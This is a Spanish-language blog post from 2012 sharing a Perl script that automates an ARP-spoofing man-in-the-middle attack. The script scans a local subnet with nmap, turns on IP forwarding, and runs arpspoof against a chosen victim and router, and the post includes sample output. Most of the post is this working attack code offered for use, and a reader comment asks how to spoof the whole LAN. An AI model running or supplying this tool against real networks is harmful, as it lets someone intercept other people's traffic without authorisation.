sábado, 22 de septiembre de 2012

[Perl] ARP-Spoofer - t00l ~~



Bueno no explicare para que sirve esta herramienta ya que esta bastante tocado el tema, pero es algo que me ahorra bastante tiempo cuando me pongo a jugar realizando Mitm , más la utilizacion de Wireshark
Sé que hay modulos especializados en esto, pero queria hacerlo asi nomas a mano.

Lo que haces es:
 [+] Buscar ips activas gracias a NMAP
 [+]Revisar y cambiar el valor de /proc/sys/net/ipv4/ip_forward para redireccionar el trafico.
 [+]Falsear la tabla ARP , una vez detenido el script vuleve los valores a la normalidad.


OJO: Debe ejecutarse como root.  

                              .
#!/usr/bin/perl -W

#Coded for @Shinee_
#blog.xshinee.cl
#reportes.vulns@hotmail.com

#Se debe correr como root !

use strict;

system("clear");

my $answer; #variable local


&BAN;

print "\n\n[+]Buscando ips Activas:\n\n";
system("sudo nmap -sP 192.168.2.0/24 | grep Host ");  

print "\n[+]Ingresa las ip objetivo:  ";
chomp(my $ipobj = <STDIN>);
print "[+]Ingrese ip del Router:  ";
chomp(my $iprout = <STDIN>);

print"\n\n[+]Revisando el valor de ip_forward:  ";
system("cat /proc/sys/net/ipv4/ip_forward \n\n");
$answer = qx(cat /proc/sys/net/ipv4/ip_forward\n);
if ($answer == 0) { print "[+]Habilitando el Forwarding..\n";system("echo 1 > /proc/sys/net/ipv4/ip_forward")
};

print "\n\n[+]Ingresa tu Interface(ej: wlan0 ó eth0 ):    ";
chomp(my $interface = <STDIN>);

print "[+]Comenzando...                --> [+]Ctrl + c  Para detener ! \n\n";

system("arpspoof -i $interface -t $ipobj $iprout");


$SIG{'INT'} = &Interrupcion ;

print "\n[+]Buen dia!\n\n\n";

sub Interrupcion() {
             print("\n[+]Deshabilitando el Forwarding..\n");
             system("echo 0 > /proc/sys/net/ipv4/ip_forward\n");
             print("[+]Revisando el valor de ip_forward: ");
             sleep 1;
             system("cat /proc/sys/net/ipv4/ip_forward\n\n");
             sleep 1;
             print("[+]Listo !");

         }



sub BAN(){
print q(
[#################################]
   
     __ _ _ _ _ __ 
    / _` | '_| '_ \
    \__,_|_| | .__/
             |_|   

Arpspoofing t00l ~ Shinee



_______\o/__\o/__\o/__\o/_________

[#################################]
);
}


exit;

En la salida veremos algo como esto:


[#################################]
   
     __ _ _ _ _ __ 
    / _` | '_| '_ \
    \__,_|_| | .__/
             |_|   

Arpspoofing t00l ~ Shinee



_______\o/__\o/__\o/__\o/_________

[#################################]


[+]Buscando ips Activas:

Host 192.168.2.1 is up (0.0016s latency).
Host 192.168.2.2 is up.
Host 192.168.2.3 is up (0.051s latency).

[+]Ingresa las ip objetivo:  192.168.2.3
[+]Ingrese ip del Router:  192.168.2.1


[+]Revisando el valor de ip_forward:  0
[+]Habilitando el Forwarding..


[+]Ingresa tu Interface(ej: wlan0 ó eth0 ):    wlan0
[+]Comenzando...                --> [+]Ctrl + c  Para detener ! 

XXXXXXXXX: arp reply 192.168.2.1 is-at XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX: arp reply 192.168.2.1 is-at XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX: arp reply 192.168.2.1 is-at XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX: arp reply 192.168.2.1 is-at XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX: arp reply 192.168.2.1 is-at XXXXXXXXXXXXXXXXXXXXXXXX

[+]Deshabilitando el Forwarding..
[+]Revisando el valor de ip_forward: 0
[+]Listo !
[+]Buen dia!

Saludos.
Publicadas por a la/s
Etiquetas:

1 comentario:

Unknown dijo...

Shinee_ excelente !, una consulta, es posible arpear la LAN completa (?) un saludo, @li70v.

24 de septiembre de 2012, 12:26

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)